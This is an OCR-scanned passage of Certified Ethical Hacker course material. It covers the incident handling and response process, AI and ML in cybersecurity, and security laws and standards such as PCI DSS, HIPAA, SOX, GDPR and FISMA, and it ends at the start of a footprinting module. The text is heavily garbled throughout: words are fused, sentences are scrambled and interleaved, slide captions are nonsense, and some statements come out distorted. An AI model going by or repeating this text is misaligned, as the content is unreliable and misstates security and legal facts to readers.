Increase andproductivity
user andcustomer satisfaction
Improve
Assisti n handling
futureincidents
ical andCountermensores
Mackin ©by E-Comel
Copyright
Conducting
trainingsessionsto spread
awarenessamongusersis an important partof incident
Suchsessions helpend-usersto recognize suspiciousevents or incidentseasily
management.
andreporta n attacker's
behaviorto theappropriateauthority,
Thefollowing peopleperform
incidentmanagement activities:
=
Human resources personnel take stepsto fire employees
suspected
of harmful
computer
activities
The legalcounsel sets the rulesand regulations Theserules can
in an organization.
influencethe internal securitypolicies
and practicesof the organization
i n case an
or
an organization’s
insider
or
malicious
activities.
attackerusesthe
Thefirewallmanagerkeeps
system
filtersin place.
forharmful
Thesefiltersare frequently
wheredenial-of-
service attacksare made.
An outsourced
service provider
repairssystems infected byviruses andmalware,
Incident responseis one of the functions performed i n incident handling.In turn, incident
handling of
is one the services provided
illustratesthe relationship
‘management.
as partof incidentmanagement. Thefollowing
betweenincident response,incident handling,
diagram
and incident
Incident
Management
Vulnerability
Handling. IncidentHandling
[ Aetifact
Handling J
Announcements
=. Analysis 7
So]
Figure
1.4:lock Diagram
of Incident
Man
ical andCountermensores
Mackin ©by E-Comel
Copyright
Incident Handling
and Response
Steps
involvedinthe IHAR proces
@Preparation © cscaion
©seen cordingandAsigment
—
©
Q
recovery
ern
@rerern fmt
2 ——e
©viene ctheringnd
Forensic
Anata niet Oadonee
Incident Handling
and Response
Incident handling and response (IH&R) is the process of taking organized and carefulsteps
whenreacting to a security incidentor cyberattack. It is a set of procedures, actions,and
measures taken against an unexpected event occurrence. It involveslogging, recording,and
resolvingincidents thattakeplace i n the organization. It notesthe incident, whenit occurred,
and its cause. Itis the practice
its impact, of managingtheincidentresponseprocesses, suchas
preparation,detection, containment,eradication, and recovery,to overcome the impactof an
incidentquickly and efficiently. IH&Rprocesses are important to provide a focusedapproach
for restoring
normalbusinessoperations as quickly as possible after an incidentand with a
minimalimpacton the business.
The IH&R process involvesdefining u ser policies,
developing protocols,
buildingincident
responseteams, auditing organizational assets,planning incident responseprocedures,
obtainingmanagement approval,incidentreporting, and managingresponse.It
prioritization,
alsoincludesestablishing
proper communication betweenthe individualsresponding to an
themto detect,analyze,
incidentandguiding contain,recover, andpreventincidents.
Discussed
beloware the stepsinvolvedi n the IH&Rprocess:
=
1:
StepPreparation
phase
The preparation includesperforming
an audit of resources and assets to
determinethe purposeof security and definethe rules,
policies,
and procedures that
drivethe IH&Rprocess. It alsoincludesbuildingandtraining
an incident response team,
definingincidentreadiness procedures,andgathering required toolsas well as training
the employees to secure
their systemsandaccounts,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Step Recording
2: Incident andAssignment
In this phase, and recording
the initial reporting of the incidenttake place.
Thisphase
handles identifying an incidentanddefining properincident communication plans for
the employees and alsoincludescommunication methodsthat involve informing IT
supportpersonnel or submittingan appropriate ticket.
Step3:
Incident
Triage
In this phase, the identifiedsecurityincidentsare analyzed, validated, categorized,and
prioritized.TheIH&Rteam further analyzes the compromised deviceto find incident
details such as the type of attack,its severity,target,impact,and methodof
propagation, andany vulnerabilitiesit exploited,
Step 4: Notification
In the notification phase, the IH&R team informsvarious stakeholders, including
management, third-party vendors,andclients, aboutthe identified incident.
Step 5: Containment
Thisphase helps to preventthe spread of infectionto other organizational assets,
preventing additionaldamage.
Step 6: Evidence Gathering andForensicAnalysis
In this phase, the IH&Rteam accumulates all possible evidencerelatedto the incident
andsubmitsit to the forensic department for investigation. Forensicanalysis of an
incidentrevealsdetailssuchas the methodof attack,vulnerabilitiesexploited, security
mechanisms averted, networkdevices infected, andapplications compromised.
7:
Step Eradication
In the eradicationphase, the IH&Rteam removes or eliminatesthe root cause of the
incidentandclosesallthe
Step 8: Recovery
attack
vectors to prevent similarincidentsi n the future,
After eliminating the causes for the incidents,the IH&Rteam restores the affected
systems, services,resources, anddata through recovery.It is the responsibility of the
incidentresponse team to ensure that that the incidentcauses no disruption to the
services
Step
or oforganization.
businessthe
9: Post-Incident
Activities
Oncethe processis complete, the securityincidentrequiresadditionalreview and
analysisbeforeclosingthe matter. Conductinga final review is an important
stepi n the
IH&Rprocess that includes:
©
documentation
© Incident
Incident
impactassessment
©
and
Reviewingrevising policies
the
Closinginvestigation
Incident
disclosure
ical andCountermensores
Mackin ©by E-Comel
Copyright
Roleof Al and ML in CyberSecurity 413
H
Learning
‘Machine
Unsupervised
Learning Supervised Learning
a to
securtymarketf spredicted
reach valueof $38.2 billion
by
2026,
08
Module 62
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Roleof Al and ML in CyberSecurity
(Cont'd)
STEP
413
H
ARTIFICAL
‘CYBERSECURITY'SNEXT MAP:
MARKET
t CBinsets,a longside
‘According i COMPANIES
SECURING
THEFUTURE
WITH INTELLIGENCE
to offernovel
solutions
to
cyber
threats
the
{emerging
byleveraging
‘cybersecurity
isthefourth most
active industry
thatdealswith
companies applying
Al
(@:
Role of
AIandML in Cyber
Machinelearning
Security
(ML)andArtifical Intelligence
(Al)are now popularly
usedacross various
and applications
industries dueto the increase i n computing and
power, data collection,
capabilities.
storage
‘Along
with technological advancements i n Al,suchas self-driving
cars, language
translators,
andbigdata,thereis alsoa rise in threatssuchas ransomware, botnets,
malware,andphishing,
UsingAl andML in cybersecurity
helpsto identifynew exploits
and weaknesses,whichcan be
easily
analyzed furtherattacks.
to mitigate It reducesthepressure professionals
o n security and
alertsthemwhenevera n action is needed.
What
are Al andML?
intelligence only
Artificial is the solutionto defendnetworks thevarious attacks
against that an
antivirus scan cannot detect.A hugeamount of collecteddata is fed into the Al, which
processesandanalyzes it to understand i ts detailsandtrends.
ML is a branchof artificialintelligence (Al)that givesthe systemsthe ability to self-learn
without any explicit
programs. Thisself-learning systemis usedto define what the normal
network, along with its devices, lookslike,andthen uses this to backtrack andreportany
deviationsor anomaliesi n real-time.
techniques:
Thereare two typesof ML classification
‘=
Supervised
Learning
Supervised learning that inputa set oflabeledtrainingdatato attempt
usesalgorithms
betweenthe given labels.Supervised
to learnthe differences learning is furtherdivided
into two subcategories,
namely,
classification
andregression.Classification
includes
ical andCountermensores
Mackin ©by E-Comel
Copyright
dividedclasses.
completely Its main taskis to definethe test sampleto identify
its class.
Regression
is usedwhen data classes a re not separated, suchas when the data is
continuous,
Unsupervised Learning
Unsupervised learning makesuse of algorithms that inputunlabeledtrainingdata to
attemptto deduce without guidance.
all the categories Unsupervisedlearning
is further
divided into two subcategories, namely, clusteringand dimensionality
reduction
Clusteringdividesthedatainto clusters regardless
basedon theirsimilarities, ofclass
information. Dimensionality reduction is the processof reducing the dimensions
(attributes)
WhyAl andML?
of
data,
Source:https://www.gartner.com,
https://www.marketsandmarkets.com
threat landscape
Thesecurity but,more importantly,
continues to evolvenot just i n scale, in
sophistication.
Despite a range of advancements i n the industry to safeguardagainst
Increasingly
bold and intricate threats,organizations have struggled to keeppace with the
technologies
andtechniques employed byattackers,
As companiescontinue to increase their digital
footprints,
“identify
anddiagnose―
capabilities
are not enough to remediateagainstthis growing fundamentalbusinesschallenge for
of all shapes
organizations andsizes. The development analytics
of advancedsecurity is an
importantconsiderationfor organizations lookingto implement machinelearning
to defend
an arrayofinternal
against andexternalsecurity threats.
securitymarketis set to exceed$300billion by2024,and the Al-relatedcyber
The cyber
security to reacha valueof $38.2
marketis predicted billionby2026.
AI in Cyber
Security
Market,byRegion
(USDBillion)
ical andCountermensores
Mackin ©by E-Comel
Copyright
andML Application
‘Al Areas
Source:https://www.cbinsights.com
According
to CB Insights,
alongside
overall rising investment activity,many cybersecurity
companies to cyber
a re emergingto offernovelsolutions threatsbyleveraging
the advantages
of artificialintelligence
(Al)
Accordingto CB Insights’ cybersecurity
Al DealsTracker, is the fourth most active industry
for
dealsto
companies
cybersecurity Insights’
data, private
applying
companie
Al. AsperCB
that are usingAl,categorized
thereare over 80
into the nine main areas i n whichtheyoperate:
in
'*
Anti-fraudandidentity management Cyber-risk management
=
=
Mobile
Predictive
intelligence App
security
security =
=
loTsecurity
and security
Behavioralanalytics anomaly
detection
"Deception
Automatedsecurity
jm CYBERSECURITY’S
NEXTSTEP
MARKET
MAP:
1FRAUD
ANTI
80+COMPANIES
MANAGEMENT
SECURING
& IDENTITY
THEFUTURE
WITHARTIFICIAL
INTELLIGENCE
MoBILESECURITY
AGAR feeazoi
rane Hc askyming
Blew —_
Bente crowe auainy
Bomanos science
watt sn
.
2Soeure
2 oem
PREDICTIVE
INTELLIGENCE
8
soanoeat
avomaty
Peopovont
wuunes:
cevecron
:
i
AUTOMATED CYBER-RISK
SecuRiTY
eer
MANAGEMENT
o
ceetnet | = Orne Steptoe
|ge —
| Ziaveun CÂ¥toro
OX Braystax
oranuwe
DECEPTION
Seconiry
Bostile CWO ov
© CBINSIGHTS
Module
08 72
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
HowDo Al and ML PreventCyber
Attacks?
EE rssworrotecton
and
authentication
Td ecw
secty
Phishing and Prevention
Detection AbasedAntivirus
ThreatDetection Fraud
Detection
Vulnerabity
Management BotnetDetection
Behavioral
Analyte ‘toCombat
Al Theats
ical andCountermensores
Mackin ©by E-Comel
Copyright
ThreatDetection
Machine learning assists companiesin detecting cyber-attacks
before systemsa re
compromised.Being a partof Al,machinelearning
constantlykeeps adminsnotifiedof
imminent cyberthreatsbycarryingout logicaldata analysis.
ML allowssystems to run
its algorithms
upon the data being then performs
received, deeplearning on the and
comprehends the advancements requiredto ensure the safety of the information
systems.
Vulnerability
Management
Al andML-based systems never allowvulnerability to exist for long;
theydynamically
scan for all typesof vulnerabilitiesandalertthe adminsbeforethe system is exploited.
They can alsoprovide theattacker's informationandthe patternsusedto perform the
attack.TheseAl- andML-basedsystems can alsoforecasthowandwhena vulnerability
exploitation
might
occur.
Analytics
Behavioral
‘Anothernotablesecurity
improvement byartificialintelligence Analytics.―
is “Behavioral
Attackers who havestolenthe credentials of a legitimateuser can perform malicious
activities on the organization’s
network; suchattemptsare difficult to detect and
Al softwareinstantly
regular usage.
ML
thwart. Here,Al with generates specific user patterns basedon their regular
alertsthe adminif it detectsanysuspicious usage.
activityor deviationin
NetworkSecurity
Two significant
factorsof network securityare generating
comprehensive
security
policies network topology.
and mappingan enterprise's Unfortunately,
both of these
factorsare time-consuming. Therefore,
administrators Al to enhance
are adopting this
operation;it can carry out the networktraffic analysis
and propose efficientsecurity
policies
bydefault.
Al-basedAntivirus
Traditionalantivirus toolsperformfile scanningon the organization's
networksto check
if any signatures match thoseof knownviruses or malware. Theissuewith this is that
antivirus tools must be updated when the user wants to scan for new malwareor
viruses. Updating is time-consuming,andnew deployment oftentakesa certain amount
of time, To overcome theseissues,organizations employ Al-basedantiviruses,whichuse
anomaly detection to understandprograms’ behavior.Al-basedantivirus detects
suspicious programbehaviorinsteadof matching signaturesforviruses.
FraudDetection
Al and ML algorithms carry out anomaly detectionto identify
payment inconsistencies
andfraudulenttransactions. Theyalso perform automatedpatterndiscovery across
different transactions. ML can easilydifferentiatebetweenauthenticand illegitimate
transactionsandblocks fraudulent
transactions.
ical andCountermensores
Mackin ©by E-Comel
Copyright
BotnetDetection
Botnets can bypass the Instruction Detection System (IDS)by leveraging its
ineffectivenessi n matching
signatures.Botnets can be embeddedusing a highly
sophisticatedcodethat makesthemuntraceablebytraditionalIDSimplementations.
Hence, security use Al and ML algorithms
professionals that alert aboutthe suspicious
behaviorof a networkanddetectunauthorizedintrusions.
Al to CombatAl Threats
Attackerscan also leverage Al technology to maketheir way into an organization's
network;suchcyber threatsmust bedetectedimmediately. Al softwarec an detect
such
imminent Al-augmented attacksbeforethe networkis compromised.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
CEH
@ Berman
= sce
© mcrsng
concente
EthicalHacking Information
Security Security
Information
x mKQ
Information Laws and Standards
Security
Lawsare a systemof rules and guidelines that are enforced bya particular countryor
community to govern behavior.A Standardis a “document establishedbyconsensus and
approvedbya recognized body that provides, forcommon and repeated guidelines,
use, rules,
for activities or their results,
or characteristics aimed at the achievementof the optimum
degreeof orderin a given context.― Thissection dealswith the various lawsand standards
dealing
withinformationsecurity i n differentcountries.
ical andCountermensores
Mackin ©by E-Comel
Copyright
1
Card Industry
Payment DataSecurity
Standard(PCIDSS)
CEH
tat Secunty standard
for
cards
(©T hePayment nds
caré Data tandord(PSS) 2 proprietaryinformation
security
orzanantonehandle
ardor for majordebt,ced, prep, epee, ATM, indPOS
information
HighLevel Overview
CardIndustry
Payment Standard(PCIDSS)
Data Security
Source:https://www.pcisecuritystandards.org
‘The
Payment Card Industry Data Security Standard(PCIDSS) is a proprietaryinformation
security standardfor organizations that handlecardholderinformation for the majordebit,
credit,prepaid,e-purse, ATM,and POScards.Thisstandardoffersrobustand comprehensive
standardsand supporting materials to enhancepayment carddatasecurity. Thesematerials
includea frameworkof specifications, tools,measurements, and supportresources to help
organizationsensure thesafehandling ofcardholder information.PCIDSSapplies to all entities
involvedin payment cardprocessing,including merchants, processors,acquirers, issuers,and
service providers,
as well as all otherentities that store,process or transmit cardholder data
PCIDSS comprisesa minimum set of requirements for protectingcardholderdata.ThePayment
Card Industry (PCI)Security StandardsCouncilhas developed and maintains a high-level
overview of PCIDSS requirements.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Table1.3:Tableshowing Standard—High
thePCIDataSecurity LevelOverview
Failure
to meet PCIDSSrequirements
mayresulti n finesor the termination of payment-card
processingprivileges.
08
Module 78
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
ISO/IEC27001:2013
CEH
“©
species
soytec27001:2013 forestablishing,
the requirements
information securitymanagement
implementing. nd contnaly improving
maintaining,
withinthe cntet af theorganization
system
of°)
to besutableforseveralferenttypes we, nuding
cary
rerementsandobjeaiver managomentprcenie
Ls with of norton
ompance
thin ezaizaons to ensure Inpeasttion butte enalig
procsses ‘ovntermation
secur customers
ISO/IEC27001:2013
Source:https://www.iso.org
ISO/IEC the requirementsfor establishing,
27001:2013specifies implementing,
maintaining,
andcontinuallyimprovingan information
securitymanagementsystem withinthe context ofan
It includesrequirements
organization. for the assessmentand treatment of information
riskstailoredto theneedsofthe organization,
security
regulation
‘The is intendedto besuitableforseveraldifferentuses,including:
Use within organizations to formulatesecurityrequirements andobjectives
=
Usewithin organizations way to
as a ensure risksare cost-effectively
that security
managed
to ensure compliance
Usewithin organizations with lawsandregulations
Defining
new information
security
management processes
Identifying
andclarifying information
existing security
management
processes
oforganizations
Usebythe management to determinethe status ofinformation
management
security activities
Implementing
business-enabling
informationsecurity
Usebyorganizations
to provide
relevant information
aboutinformationsecurityto
customers
ical andCountermensores
Mackin ©by E-Comel
Copyright
j
Health InsurancePortability
and Accountability
Act (HIPAA)
CEH
lectrnleTeansuctlon Roques very provider
who
dvs towne
th
same
beet
cre
businessactoicaly
Hale
Security
the of
Use to ensure confer, itr, on valoity health
electoral protected
TRequrernenta
that transactions
umber ent them tached to standard
Provides thestandards
for enforcing
athe Res
AdminstzationSimpfeaton
electronically
availability
of
Theofficeof civil rights
protected
implemented
healthinformation,
AdministrativeSimplification
HIPAA’s Statuteand Rules,
asdiscussed
below:
=
Electronic
Transactions
Transactions
andCodeSetStandards
are electronicexchanges involvingthe transferof informationbetween
partiesfor specific
‘two purposes. TheHealthInsurance Portability and Accountability
of 1996 (HIPAA)
‘Act designated certain typesof organizations as coveredentities,
including healthplans,healthcare clearinghouses, andcertain healthcare providers. In
the HIPAAregulations, the Secretary of Healthand HumanServices(HHS) adopted
certain standardtransactions for the ElectronicData Interchange (EDI)
of health care
data. These transactions are claimsand encounter information, paymentand
remittance advice,claimstatus,eligibility,enrollmentand disenrollment, referralsand
authorizations, coordinationof benefits, and premiumpayment. Under HIPAA, if a
coveredentityelectronically conductso ne of the adopted theymust use
transactions,
the adopted standard—eitherfrom ASC,X12N,or NCPDP(forcertain pharmacy
ical andCountermensores
Mackin ©by E-Comel
Copyright
transactions).
Coveredentities must adhereto thecontent andformatrequirements
of
eachtransaction. Everyprovider
who doesbusiness electronically
must use the same
healthcare transactions,
codesets,andidentifiers.
Rule
Privacy
TheHIPAAPrivacy Ruleestablishesnationalstandardsto protectpeople’s medical
records
andother personal
healthinformation andapplies to healthplans, healthcare
clearinghouses,
andhealthcare providersthat conductcertain healthcare transactions
electronically. safeguards
The rule requiresappropriate to protect the privacy of
personal healthinformation.It sets limitsandconditionson the uses and disclosures
that may bemadeof suchinformationwithout patient authorization.
Therulealsogives
patientsrights over their healthinformation,including the rightto examine andobtaina
copy of their healthrecordsandto request corrections.
SecurityRule
TheHIPAASecurity Ruleestablishes nationalstandardsto protectindividuals’
electronic
personalhealthinformationthat is created,received,used, or maintainedbya covered
entity.The Security Rulerequiresappropriate administrative,physical,
and technical
safeguards to ensure the confidentiality, integrity,and securityof electronically
healthinformation.
protected
Employer
IdentifierStandard
TheHIPAArequires that eachemployer
hasa standardnationalnumberthat identifies
themon standard
transactions.
NationalProvider
Identifier (NPI)
Standard
TheNationalProviderIdentifier (NPI) is a HIPAAAdministrativeSimplification
Standard
The NPI is a uniqueidentificationnumberassigned to coveredhealthcare providers.
Coveredhealthcare providers andall healthplans andhealthcare clearinghousesmust
use the NPisin the administrative andfinancialtransactions adopted underHIPAA.The
NPIis a 10-position,intelligence-free numeric identifier(10-digit
number). Thismeans
that the numbersdo not carry other informationabouthealthcareproviders, suchas
the state in whichtheylive or theirmedicalspecialty.
Enforcement
Rule
The HIPAA EnforcementRule contains provisions relatingto compliance
and
as well as the imposition
investigation, penalties
of civilmonetary forviolationsofthe
HIPAA
AdministrativeSimplification
Rulesandprocedures
for hearings.
ical andCountermensores
Mackin ©by E-Comel
Copyright
SarbanesOxley
Act (SOX)
in
{@Enacted 2002,
the Acts designed
SarbanesOxley to protect
investors
bytheand
andthepublic increasingaccuracy
TideT
| Pub
poe
company
penn
AeountingOveright
VE_—
|
‘Tie Commision Reources ad atonty
‘Tile Auterindependence
‘Title
VIE Stes anaRopar
‘Title
1 compartesponataty
Serer
‘nieve end
lo
| Eohaeed
antl Dadonuet
White
Pasty
‘Title
IK
Enhancem Ctr crime
TitloV
| Anacostia
rae
‘tle Corporateets
ical andCountermensores
Mackin ©by E-Comel
Copyright
behaviorsof corporate officers anddescribes specific forfeitures of benefitsandcivil
penalties for non-compliance.
Title IV: EnhancedFinancialDisclosures: Title IV consistsof nine sections.It describes
enhancedreporting requirements forfinancial transactions, including off-balance-sheet
transactions, pro-forma figures, and the stocktransactions of corporate officers.It
requiresinternalcontrolsto ensure theaccuracy offinancial reportsanddisclosures and
mandatesbothauditsandreportso n thosecontrols.It alsorequires timely reporting of
materialchanges i n financial conditions andspecific enhanced reviews of corporate
reportsbytheSECor its agents,
Title V: Analyst Conflictsof Interest:TitleV consistsof onlyone section that discusses
the measures designed to help restore investor confidence i n the reporting of securities
analysts. It definesthe codeof conductfor securities analysts and requiresthat they
discloseany knowableconflictsof interest.
Title VI: Commission Resourcesand Authority: Title VI consistsof four sections and
defines practices to restore investor confidence in securitiesanalysts. It alsodefines the
SEC's authority to censure or bar securities professionals from practice anddefinesthe
conditionsto bara personfrompracticing as a broker, advisor, or dealer.
Title Vil: Studiesand Reports: Title Vil consists of five sections and requiresthe
Comptroller Generaland the Securitiesand Exchange Commission (SEC) to perform
various studiesandto report theirfindings. Therequired studies andreportsinclude the
effectsof the consolidation of public accounting firms,the roleof creditratingagencies
i n the operation of securities markets, securitiesviolations, enforcement actions,and
whetherinvestment banksassistedEnron, GlobalCrossing, andothersto manipulate
earningsandobfuscate true financial conditions.
Title VIII: Corporate and CriminalFraudAccountability:Title Vill,alsoknownas the
“Corporate andCriminalFraudAccountability Actof 2002," consistsof seven sections.It
describes specific criminalpenalties for the manipulation, destruction, or alterationof
financial recordsor interferencewith investigations, while also providing certain
protections for whistle-blowers.
Title IX: White-Collar-Crime Penalty Enhancement: Title IX,alsoknownas the "White
CollarCrimePenalty Enhancement Act of 2002,― consistsof six sections. Thistitle
increases the criminalpenalties associated with white-collarcrimes and conspiracies.It
recommends strongersentencing guidelines and specifically addsfailureto certify
corporate financialreports as a criminaloffense.
Title X: Corporate TaxReturns:TitleX consistsof one section that states that the Chief
Executive Officer
Title XI: Corporate tax
shouldsignthecompany return.
FraudAccountability: Title XI consistsof seven sections. Section
1101recommends the following name for the title: “Corporate FraudAccountability Act
of 2002.― It identifies corporate fraudand records tampering as criminaloffensesand
joins thoseoffensesto specific penalties. It also revises sentencing guidelines and
strengthens penalties. Doingso enablesthe SECto temporarily freeze “large―
or
“unusual―
transactionsor payments,
Organization ow
Inttetal
Property eration (WFO)
aw that (© Fst provies
cies at
comprehensive
sp Fel
ramet fo ensuing
The Digital
Millennium Act (DMCA)
Copyright
Source:https://www.copyright.gov
‘The
DMCAis an American copyright
lawthat implements
two 1996treaties from the World
IntellectualProperty
Organization (WIPO): the WIPO CopyrightTreatyand the WIPO
Performances and PhonogramsTreaty. UStreatyobligations,
In orderto implement the DMCA
defineslegalprohibitions
againstcircumvention of the technological
protectionmeasures
employed bycopyright
owners to protect their works,
andagainstthe removalor alterationof
copyrightmanagementinformation.TheDMCAcontainsfivetitles
|:
‘Title WIPOTREATY IMPLEMENTATION:
makescertain technicalamendments
references
Title | implements the WIPOtreaties. First,
to US law i n order to provide
andlinksto the treaties. Second,
the appropriate
it creates two new prohibitions
it
in Title 17
of the U.S.Code—one on circumvention of the technological measures used by
copyrightowners to protecttheir works and one on tampering with copyright
management information—andaddscivil remediesandcriminalpenalties for violating
theprohibitions,
TitleI: ONLINECOPYRIGHT INFRINGEMENT LIABILITYLIMITATION:TitleIl of the DMICA
addsa new section 512 to the Copyright
Act to create four new limitationson liability
for copyright infringement
byonlineservice providers. A service providerbasesthese
limitationson the following
four categories
of conduct:
©.
©.
Transitory
communications
System
caching
Theuser-directed of information
storage or networks
on systems
ical andCountermensores
Mackin ©by E-Comel
Copyright
Information
locationtools
New section 512 also includesspecial rules concerningthe application
of these
limitationsto nonprofit
educationalinstitutions,
TitleIl: COMPUTER
MAINTENANCE TitleIl ofthe DMCAallowstheowner
ORREPAIR:
cofa copy of a program to makereproductions or adaptations whennecessaryto use the
programi n conjunction with a computer. Theamendment permitsthe owner or lessee
of a computer to makeor to authorizethe making of a copy of a computer program i n
thecourse of maintaining or repairingthat computer
the
hulls(includingdecks) ofvessels
Federal Information Security
‘The
n o longer
Management
than200feet
Act (FISMA)
Source:httpsi//esre.nist.gov
TheFederalInformationSecurity
Management to produce
Act of 2002was enacted severalkey
standardsand guidelines
security required
byCongressionallegislation.
TheFISMAprovidesa
comprehensive
frameworkfor ensuringthe effectiveness
of informationsecuritycontrolsover
informationresources that supportfederal operations and assets. It requireseachfederal
agencyto develop, document, and implement
an agency-wideprogramto provide information
security for the informationandinformationsystems
that supportthe operations andassetsof.
the agency,including thoseprovided or managedbyanotheragency,contractor, or another
source, TheFISMAframework includes:
=
Standards
for categorizing bymissionimpact
informationandinformationsystems
+
Standardsfor the minimum for informationand information
securityrequirements
systems
Guidancefor selecting
appropriate controlsfor informationsystems
security
Guidancefor assessingsecurity and determining
controlsi n informationsystems their
effectiveness
Guidanceforthe security
authorizationofinformation
systems
ical andCountermensores
Mackin ©by E-Comel
Copyright
GeneralDataProtectionRegulation
(GDPR)
(©
.GoPR
regulation
eloballyinto
on
May
25,one
ofthe
was
most
privacy
put
security
laws
eect 2018and stringent and
(©
wit
levy
TheGOR harsh
tensofmilonsoferos
i nesagunet
thosewho violate and secu standard,
ts privacy
Storage
tation: datong
Intenty
cWnfdentiaity
specied
purpose
Youmayoly store personaly
appropriate
andconfident: Processing
entivng
mustbedonein sch
by using encryption
( eg.
foras
way to ensve
forthe
as necessary
ecu Integy, nd
1
responsible
demonstrating
GPR
compliance
Thedatacontrol
Accountabity: for wihaltheseences
GeneralDataProtectionRegulation
(GDPR)
Source:https://adpr.eu
The GeneralDataProtectionRegulation (GDPR) is one of the most stringentprivacy and
security lawsglobally.
Though it was drafted andpassed bythe European Union(EU), it imposes
obligations onto organizationsanywhere, so longas theytargetor collectdata related to
people i n the EU.Theregulation
finesagainst
was put into
effect GDPR
on May
thosewhoviolate its privacyand security
25,2018.The
standards,
will levy
with penalties
reaching
harsh
tens
of millionsofeuros.
WiththeGDPR, Europe signifies whenmore people
its firmstanceon dataprivacyandsecurity
their data with cloud services, and breachesare a dailyoccurrence. The
are entrusting
regulation
itself is extensive,far-reaching, lighto n specifics,
and relatively making GDPR
compliancea daunting prospect,particularlyfor smallandmedium-sized (SMES).
enterprises
Data Protection Principles
GDPR
‘The
GDPRincludesseven protection principles
andaccountability outlined i n Article5.1-2:
=
Lawfulness, andtransparency:
fairness, must be lawful,
Processing fair,andtransparent
to thedatasubject.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Storage limitation:You may onlystore personally identifying
data for as longas
necessaryfor the specified
purpose
Integrity and confidentiality:
Processingmust be done i n sucha way as to ensure
appropriate security,
integrity, (e.g.,
andconfidentiality byusingencryption).
Accountability: Thedatacontrolleris responsible
for demonstratingGDPR compliance
withall of theseprinciples.
ical andCountermensores
Mackin ©by E-Comel
Copyright
DataProtectionAct 2018(DPA)
(© The
P a 2018s
lawnthe UK protects
individuals
of
|a: TheoP
processing
‘the
parca by
personal
at,
once
n
i nt
andthe
Protection data
updates replacesData
tobe
or
another
1 personal
Requing
Towanda,
consent
processed
basedon thedata
25
Act 1908 subject’ specie
and came effect on May,2018 sts
Confringeghts
on thedata subject
to
to to
ian
cormecton
with
the
act make provisonforthe regula
of information reiting individualto
onal dase reac
directConfring
functions leormation
Commissioner's
funeions
preision i n
‘make the
to fora
underspeteegulations Commisionr ging toler f that
relatingto information,make provision e e responaityfo mantra
code
‘marketing of practiceand connectedpurposes tore thew
prowsions
ical andCountermensores
Mackin ©by E-Comel
Copyright
1
CyberLaw in DifferentCountries CEH
Pr ne‘The
ant
radon
USE 15 205-127) epaego
gor
Fenntai het spears
nto sates
ey
rot rere
At of 974
ct
epee
pelwmunatee
gor
go
sey comico
e um Tete Soi
te ee Cet 8
7
‘HeheAme eh apr 87 opufmoniped
nen
08
Module 89
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
CyberLaw in DifferentCountries (Cont'd) 413
H
Pe
Dre
aly
Japan
rl
(aw Management
caderie
The ademarkw
(22.3400)
18
Mo 127 957),copy Buss
peewee
toe/hem or
oryCentSC. 398 640 radon oan ie
poe tea gees
Singapore
fe
SouthAiea
Compt
Traders
Corot
At
18
178
85,
oso anee ne
esinncpecoze
row
No.
SouthKorea
Cera
Industria en
Core ae 006/808
At 386
rt at
epenccyreceke
rose
repent
gor
Belgium
Beal medion
Hong
Kone
Unatered
Arie 1390 ae La
ore te irton tem epee
pene
domstaine
ancongoeh
Law in DifferentCountries
Cyber
Cyberlaw
or Internet law refersto
any lawsthat dealwith protectingthe Internetandother
onlinecommunication technologies.
Cyberlawcovers topicssuchas Internetaccessandusage,
privacy,freedomof expression,and jurisdiction.
Cyber laws provide a n assurance of the
integrity, privacy,and confidentiality
security,
Theselawshavebecomeprominent
organizations.
the world. Cyber laws vary byjurisdiction
of
informationi n bothgovernmental and private
dueto the increasein Internetusagearound
and country, so implementing them is quite
challenging.
Violating
theselawsresultsin punishments
rangingfromfinesto imprisonment.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Summary
Thismedul Giacusedelements
ofinkarmatonsect information
secur tacts
413
H
andinfomationwarare
Ik cused ever kl chin methodology,
Ts, andlosin detail
Ieaeodscusted
acing nd
concepts,types, phases
ethical
Racines ls andotherpertinentifomationi n deta
cessed information
scury contolsucha s defnsesin-depth,
rk management,
module
‘Tt endedwith2 deta discussionofvarious information
secuntyact and
Module Summary
Thismodulehasdiscussed elements ofinformation security,information attacks,
security and
informationwarfare.It hascoveredcyber kill chainmethodology, TTPs,and loCsi n detail. It
also discussedhacking concepts,types,andphases. Thismoduleclosely examinedethical
hacking conceptssuchas its scope and limitationsandthe skillsof an ethicalhacker.It also
covered thetopicofinformation securitycontrolssuchas defense-in-depth, riskmanagement,
cyberthreat intelligence,
threat modeling, incident management process, and Al and ML.
Finally,
this moduleendedwith a detaileddiscussion of various informationsecurity acts and
laws.
The next modulewill examine how attackers,
as well as ethical hackersand pen testers,
perform
footprinting
to collect
information
about
their targetbeforean attackor audit
ical andCountermensores
Mackin ©by E-Comel
Copyright
; 1 0100
10141 1940101 1
©.
10101 1, 10101101,10
01101
cd
01.010104.-1
104
=oa
“e
401010a
i)14¢ T
P
|
Certified Ethical Hacker
Module02:
ola Ke
ioleldinliiare aler-y
lavemsx-rere)alalelissxe
Module Objectives
Understanding
FootprintTrough
WebteFotprintng
Understanding a ndEmaFootrmng
Networking
WebSenicesa ndSocal Stes
Understanding
WHOIS, andNetworkFooting
ONS,
LUndectanding
Footer Trough
Understanding
Socal
Eneneting
ToolandCounermesutes
oferentFotpritng
Module Objectives
is thefirst stepi n the evaluation
Footprinting of the security of the IT infrastructureof a
posture
targetorganization. Through footprintingand reconnaissance,one can gatherm aximum
informationabout a computer systemor a networkandabout any deviceconnectedto that
network.In other words,footprinting provides profile
a security blueprint foran organization
andshouldbeundertakeni n a methodological
manner.
to footprinting
Thismodulestartswith an introduction and provides
concepts insights
into the
footprinting
methodology.
The module endswith an overview of footprinting
tools and
countermeasures
of
At theend this module,
youwill beableto:
=
=
Describe
concepts
footprinting
Performfootprinting
through
searchengines andusingadvancedGoogle
hacking
techniques
footprinting
Perform through
web services andsocialnetworking
sites
Performwebsitefootprinting
andemailfootprinting
DNS,
PerformWhois, andnetworkfootprinting
Performfootprinting
through
socialengineering
footprinting
Usedifferent tools
footprinting
Apply bestpractices
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Flow
Footprinting
Tools
Footprinting
Concepts
Ethical
legal
nature
hacking
is
to in
security
organizatio
andconductedevaluate
the
